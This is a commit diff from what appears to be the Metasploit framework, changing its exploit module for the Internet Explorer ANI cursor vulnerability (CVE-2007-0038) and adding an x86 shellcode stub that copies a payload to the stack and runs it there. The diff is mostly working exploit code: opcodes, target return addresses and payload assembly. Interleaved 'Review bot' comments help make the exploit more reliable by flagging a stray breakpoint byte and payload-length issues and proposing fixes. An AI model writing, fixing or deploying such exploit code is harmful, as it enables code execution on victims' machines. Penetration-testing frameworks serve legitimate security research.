here we go
git-svn-id: file:///home/svn/framework3/trunk@4613 4d416f70-5f16-0410-b530-b9f4589650da
parent
fd44163b37
commit
97b6cf3636
@ -59,6 +59,29 @@ module X86
"\x75\xfa" + # jnz 0x10 (start_search)
jmp_reg('edi') # jmp edi
end
#
# Generates a buffer that will copy memory immediately following the stub
# that is generated to be copied to the stack
#
def self.copy_to_stack(len)
# four byte align
len = (len + 3) & ~0x3
stub =
"\xcc" +
"\xeb\x0f"+ # jmp _end
"\x68" + [len].pack('V')+ # push n
"\x59"+ # pop ecx
"\x5e"+ # pop esi
"\x29\xcc"+ # sub esp, ecx
"\x89\xe7"+ # mov edi, esp
"\xf3\xa4"+ # rep movsb
"\xff\xe4"+ # jmp esp
"\xe8\xec\xff\xff\xff" # call _start
stub
end
#
# This method returns the opcodes that compose a short jump instruction to
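Review bot: The stub built in copy_to_stack starts with `"\xcc"`, an int3, so anything that transfers control to the first byte of the returned buffer raises a breakpoint exception before the `jmp _end` ever runs; the jump and call displacements (`\xeb\x0f`, `\xe8\xec\xff\xff\xff`) are consistent with the 22-byte stub that follows that byte, so it looks like a leftover debugging byte and dropping the `"\xcc" +` line is the fix. This also affects the exploit hunk, where `ret << Rex::Arch::X86.copy_to_stack(payload.encoded.length)` appends the stub directly after the RIFF data (whether the trampoline lands exactly on the stub's first byte cannot be confirmed from this diff). The method also rounds `len` up to a multiple of four, so `rep movsb` copies up to three bytes past the data following the stub; a comment such as `# len is rounded up to a multiple of 4, so up to 3 bytes past the data are copied` on the alignment line would make that visible to callers. The header comment could also spell out the contract the stub relies on: the data to copy must immediately follow the returned buffer, and it is executed from esp once copied.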
@ -60,13 +60,12 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
},
'Payload' =>
{
'Space' => 1024,
'Space' => 1024 + (rand(1000)),
'MinNops' => 32,
'Compat' =>
{
'ConnectionType' => '-find',
},
'StackAdjustment' => -3500,
},
'Platform' => 'win',
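Review bot: `'Space' => 1024 + (rand(1000))` carries redundant parentheses around the `rand` call and gives no hint why the declared payload space is randomized; `'Space' => 1024 + rand(1000), # randomized so the generated file length varies between runs` would document it, assuming that is the intent. Because this hash is evaluated once when the module is loaded, every instance created in the same process will share one random value rather than getting a fresh one per run. The enclosing method starts and ends outside the hunk.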
@ -102,16 +101,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# tag contains a short jump into an embedded riff chunk that
# makes a long relative jump into the actual payload.
#
[ 'Windows Vista user32.dll 6.0.6000.16386',
{
'Ret' => 0x700b,
'Len' => 2,
# On Vista, the pages that contain the RIFF are read-only.
# In-place decoders cannot be used.
'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw }
}
]
[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]
],
'DisclosureDate' => 'Mar 28 2007',
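Review bot: Collapsing the Vista target to `[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]` drops the read-only-pages comment together with the `EncoderType => Raw` override, so the target no longer records why an in-place decoder is now acceptable; that reason (the payload is copied to the stack before it runs) lives only in a later hunk. A one-line comment above the target, `# The RIFF may be mapped read-only on Vista; the payload is copied to the stack before execution, so no encoder restriction is needed here`, keeps the rationale next to the target it applies to. The targets array continues outside the hunk.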
@ -296,22 +286,18 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
end
# Our ANI file is randomly placed into a read-only segment, the only reliable
# solution is to copy our payload back to the stack and execute it there. This
# is non-optimal and should be replaced soon.
copier =
"\xeb\x0f"+ # jmp _end
"\x68\x00\x04\x00\x00"+ # push 1024
"\x59"+ # pop ecx
"\x5e"+ # pop esi
"\x29\xcc"+ # sub esp, ecx
"\x89\xe7"+ # mov edi, esp
"\xf3\xa4"+ # rep movsb
"\xff\xe4"+ # jmp esp
"\xe8\xec\xff\xff\xff" # call _start
# Place the RIFF chunk in front and off we go
ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
ret = "RIFF" + [riff.length].pack('V') + riff
# We copy the encoded payload to the stack because sometimes the RIFF
# image is mapped in read-only pages. This would prevent in-place
# decoders from working, and we can't have that.
ret << Rex::Arch::X86.copy_to_stack(payload.encoded.length)
# Place the real payload right after it.
ret << payload.encoded
ret
end
# Generates a riff chunk with the first bytes of the data being a relative
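Review bot: `payload.encoded` is evaluated twice in the new code, once for the length handed to `copy_to_stack` and once for the bytes appended; if the framework does not memoize it (not determinable from this diff), an encoder that produces a different length on the second call would leave the stub copying the wrong number of bytes. Capturing it once removes the question: `encoded = payload.encoded`, `ret << Rex::Arch::X86.copy_to_stack(encoded.length)`, `ret << encoded`. Since the stub rounds the length up to a multiple of four, the copy may also read up to three bytes beyond the appended payload, which is worth stating in the comment above the `copy_to_stack` call. The enclosing method starts outside the hunk.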